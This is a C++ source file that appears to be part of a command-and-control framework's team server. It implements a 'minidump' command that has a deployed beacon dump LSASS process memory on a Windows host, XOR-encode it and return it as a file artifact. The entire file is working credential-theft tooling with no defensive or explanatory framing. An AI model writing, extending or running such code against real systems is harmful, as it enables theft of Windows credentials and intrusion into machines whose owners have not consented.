#include "TeamServerMiniDumpCommandPreparer.hpp"

#include <algorithm>
#include <cctype>
#include <utility>

#include "modules/ModuleCmd/Common.hpp"

namespace
{
std::string toLower(std::string value)
{
    std::transform(value.begin(), value.end(), value.begin(), [](unsigned char c)
    {
        return static_cast<char>(std::tolower(c));
    });
    return value;
}

std::vector<std::string> regroup(const std::vector<std::string>& tokens)
{
    return regroupStrings(tokens);
}

TeamServerCommandPreparerResult handledError(C2Message& c2Message, const std::string& message)
{
    TeamServerCommandPreparerResult result;
    result.handled = true;
    result.status = -1;
    c2Message.set_returnvalue(message);
    return result;
}
} // namespace

TeamServerMiniDumpCommandPreparer::TeamServerMiniDumpCommandPreparer(
    std::shared_ptr<spdlog::logger> logger,
    std::shared_ptr<TeamServerFileArtifactService> fileArtifactService,
    std::vector<std::unique_ptr<ModuleCmd>>& moduleCmd)
    : m_logger(std::move(logger)),
      m_fileArtifactService(std::move(fileArtifactService)),
      m_moduleCmd(moduleCmd)
{
}

bool TeamServerMiniDumpCommandPreparer::canPrepare(const std::string& instruction) const
{
    return toLower(instruction) == "minidump";
}

TeamServerCommandPreparerResult TeamServerMiniDumpCommandPreparer::prepare(
    const TeamServerCommandPreparerContext& context,
    C2Message& c2Message) const
{
    TeamServerCommandPreparerResult result;
    const std::vector<std::string> tokens = regroup(context.tokens);
    if (tokens.size() < 2 || toLower(tokens[1]) != "dump")
        return result;

    result.handled = true;
    result.status = -1;
    if (!context.isWindows)
        return handledError(c2Message, "miniDump is Windows-only.\n");
    if (!hasModule("miniDump"))
        return handledError(c2Message, "Module miniDump not found.\n");
    if (!m_fileArtifactService)
        return handledError(c2Message, "File artifact service is not available.\n");
    if (tokens.size() > 3)
        return handledError(c2Message, "Usage: miniDump dump [artifact_name]\n");

    const std::string nameHint = tokens.size() == 3 ? tokens[2] : "lsass.xored";
    TeamServerGeneratedFileArtifactSpec spec;
    spec.remotePath = "lsass.exe";
    spec.nameHint = nameHint;
    spec.category = "minidump";
    spec.source = "beacon";
    spec.format = "xored";
    spec.runtime = "file";
    spec.description = "XORed LSASS minidump generated by miniDump.";
    spec.tags = {"miniDump", "lsass", "xored"};
    spec.isWindows = true;
    spec.arch = context.windowsArch;
    spec.writeResultData = true;

    TeamServerPreparedDownloadArtifact artifact = m_fileArtifactService->prepareGeneratedFileArtifact(spec);
    if (!artifact.ok)
        return handledError(c2Message, artifact.message + "\n");

    c2Message.set_instruction("miniDump");
    c2Message.set_cmd("0");
    c2Message.set_outputfile(artifact.path);
    result.status = 0;
    if (m_logger)
        m_logger->info("Prepared miniDump artifact path {}", artifact.path);
    return result;
}

bool TeamServerMiniDumpCommandPreparer::hasModule(const std::string& name) const
{
    const std::string lowered = toLower(name);
    for (const auto& module : m_moduleCmd)
    {
        if (module && toLower(module->getName()) == lowered)
            return true;
    }
    return false;
}
